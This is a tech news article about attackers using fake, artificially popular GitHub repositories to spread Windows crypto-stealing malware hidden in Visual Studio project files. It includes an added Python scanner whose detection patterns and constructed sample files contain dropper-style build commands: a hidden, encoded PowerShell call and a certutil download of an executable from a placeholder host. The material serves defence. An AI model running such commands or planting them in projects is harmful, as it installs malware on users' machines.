
Windows Malware on GitHub Wants to Steal Your Crypto

Attackers are hiding malware in fake GitHub repositories crafted to seem popular and legitimate, but in reality, they're just vessels to deploy software that swipes crypto.

& Kate Irwin, Reporter


(Credit: Pavlo Gonchar/SOPA Images/LightRocket via Getty Images)

Malicious actors are gaming GitHub's search results to trick unsuspecting users into accidentally downloading Windows malware on their computers, according to a new report from cybersecurity software firm Checkmarx.

Attackers are creating GitHub repositories whose names match frequently searched topics, when in reality the repositories are thinly disguised malware, Yehuda Gelb, a research engineer at Checkmarx, writes in a blog post.

The malicious program spreading across the Microsoft-owned platform is similar to the "Keyzetsu clipper" malware, which can attack 12 different crypto wallet addresses connected to a computer, but only does so at a prespecified time on a daily basis.

The Keyzetsu malware is able to swipe a wide range of cryptocurrencies, including Bitcoin and Ethereum, by swapping wallet addresses when a user attempts a transaction. It also sends victims' details to a specifically designed Telegram bot.

Why target crypto wallets? Cryptocurrency transactions take place via blockchain networks that are decentralized enough that it's impossible to reverse a transaction. Unlike a bank, there's no one to call to ask for a chargeback when an attacker manages to access your crypto wallet or make an unwanted transaction. Most blockchains are also permissionless, meaning anyone, anywhere in the world can create a wallet and send transactions, though it is possible in many cases to trace wallets back to potential owners with some cyber-sleuthing. While crypto ownership can bring some users an increased sense of possession over their own funds, it also comes with notable risks (and price volatility).

Like Keyzetsu clipper malware, the malware Checkmarx identified will run its tasks every day without user permission. This GitHub malware also checks for a user's geolocation, and has different instructions if the user is based in Russia, though Gelb notes that the Russia contingency didn't appear to be activated yet.

The latest malware plaguing GitHub may appear legitimate, showing up at the top of search results and having tons of fake, visible stargazers—GitHub's term for users who "star" or favorite the repository. The concealed malware repositories will also have lots of frequent modifications to make them seem active, which helps boost them in GitHub's search results.

The malware itself is hiding within .csproj or .vcxproj files, according to the report, but malicious software could be hiding within other files as well. Gelb warns that GitHub users should be wary of any public repositories, and be extra cautious of any GitHub repositories posted by fresh accounts or with stargazers with newly created accounts.
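The report says the payload sits inside .csproj or .vcxproj files, which are MSBuild project files that can run shell commands at build time. The following scanner is an added example written for this article, not code from Checkmarx or PCMag: it parses a project file, pulls out every build-time command (PreBuildEvent, PostBuildEvent, PreLinkEvent and Exec tasks, which is an assumption about where such commands live, though these are real MSBuild elements) and flags commands that match a small set of heuristic indicators. The sample project files and the indicator list are constructed for the example; the indicators are a starting point for review, not a complete detection rule.

```python
import re
import xml.etree.ElementTree as ET

# Heuristic indicators for build-time commands worth a human look.
# Assumption: these strings are typical of droppers; tune for your environment.
INDICATORS = [
    (re.compile(r"powershell|pwsh", re.I), "powershell invocation"),
    (re.compile(r"-enc(odedcommand)?\b", re.I), "encoded PowerShell command"),
    (re.compile(r"invoke-webrequest|iwr\b|downloadstring|downloadfile|curl\b|wget\b|bitsadmin|certutil", re.I),
     "network download"),
    (re.compile(r"frombase64string", re.I), "base64 decoding"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", re.I), "hidden or non-interactive window"),
    (re.compile(r"\bstart\s+/b|schtasks|reg\s+add", re.I), "persistence or background launch"),
]

# Elements whose content is executed by MSBuild when the project is built.
EVENT_ELEMENTS = ("PreBuildEvent", "PostBuildEvent", "PreLinkEvent")


def _local(tag):
    """Strip the XML namespace: old-style projects use the msbuild/2003 namespace, SDK-style ones use none."""
    return tag.rsplit("}", 1)[-1]


def extract_build_commands(xml_text):
    """Return a list of (element_name, command_text) for every build-time command in the project."""
    root = ET.fromstring(xml_text)
    found = []
    for el in root.iter():
        name = _local(el.tag)
        if name == "Exec":
            # <Exec Command="..."/> inside a <Target>
            cmd = (el.get("Command") or "").strip()
            if cmd:
                found.append(("Exec", cmd))
        elif name in EVENT_ELEMENTS:
            # Old .csproj puts the command as element text; .vcxproj wraps it in <Command>
            text = (el.text or "").strip()
            for child in el:
                if _local(child.tag) == "Command":
                    text = (child.text or "").strip()
            if text:
                found.append((name, text))
    return found


def scan_project(xml_text):
    """Attach matching indicator labels to each build-time command."""
    findings = []
    for element, command in extract_build_commands(xml_text):
        hits = [label for rx, label in INDICATORS if rx.search(command)]
        findings.append({"element": element, "command": command, "indicators": hits})
    return findings


# Constructed sample: a .vcxproj with a suspicious pre-build event and a benign Exec task.
SAMPLE_VCXPROJ = """<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <PreBuildEvent>
      <Command>powershell -nop -w hidden -enc BASE64_PLACEHOLDER</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="CopyDocs" BeforeTargets="Build">
    <Exec Command="copy README.md $(OutDir)" />
  </Target>
</Project>
"""

# Constructed sample: an SDK-style .csproj (no namespace) downloading a file during build.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <Target Name="Fetch" BeforeTargets="PreBuildEvent">
    <Exec Command="cmd /c certutil -urlcache -f http://example.invalid/x.exe $(TEMP)\\x.exe" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for label, sample in (("sample.vcxproj", SAMPLE_VCXPROJ), ("sample.csproj", SAMPLE_CSPROJ)):
        for f in scan_project(sample):
            status = "FLAG" if f["indicators"] else "ok  "
            print(f"{status} {label} {f['element']}: {f['command']}  {f['indicators']}")
```

Run it over a cloned repository's project files before opening them in Visual Studio, since simply building the solution is what triggers the command. A clean result does not prove a project is safe (the report notes the payload could sit in other files too), but a flagged build event in a repository from a fresh account is a strong reason to stop.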

Unfortunately, this isn't the first time malware has circulated on GitHub. It's been a problem for years. Checkmarx has repeatedly found "a growing trend" of malware and cyberattacks via the platform, noting back in September 2023 and March this year that it's become a substantial problem. And while GitHub has taken some steps to increase security such as requiring all users to enable two-factor authentication, it's currently unclear to what extent the site actively monitors or scans its users' uploads for potential threats.

GitHub's site policies state that users cannot use its platform to engage in "unlawful attacks"; malware research is allowed, but it must be clearly labeled as such. The site typically hides violating content behind "authentication," but also sometimes removes or disables content as a "last resort."

About Our Expert

Kate Irwin

Reporter

I’m a reporter for PCMag covering tech news early in the morning. Prior to joining PCMag, I was a producer and reporter at Decrypt and launched its gaming vertical, GG. I have previously written for Input, Game Rant, Dot Esports, and other places, covering a range of gaming, tech, crypto, and entertainment news.

I’ve been a PC gamer since The Sims (yes, the original) in the CD-ROM days. I still think about my first-gen pink iPod mini, which, looking back, was not so mini. In 2020, I finally built my own custom Windows PC for gaming with a 3090 graphics card, but I also regularly use Mac and iOS devices. As a reporter, I’m passionate about documenting the wide world of tech and how it affects our daily lives.

My Areas of Expertise

  • Microsoft
  • Google
  • Artificial intelligence 
  • Cybersecurity
  • Video games are a big one. I specialize in shooters (Apex Legends, Fortnite, Overwatch) but I occasionally test out other genres as well, especially indie games or cozy games (The Sims series, Animal Crossing). 
  • The business and tech that powers video games
  • Cryptocurrency and blockchain technology
  • Social media platforms, including Meta’s apps, X/Twitter, Telegram, TikTok, etc.
  • Tech regulation

The Technology I Use

  • MSI gaming laptops
  • Nvidia graphics cards
  • AMD CPUs
  • MacBook Pro and Air laptops
  • An iPhone from 2019 (though I’m thinking about getting a “dumb phone” like the Light Phone)
  • Nintendo Switch
  • PlayStation 5
  • Freewrite Traveler 
  • At home: Sonos speakers (we have them all over the house), Philips Hue + Ring security products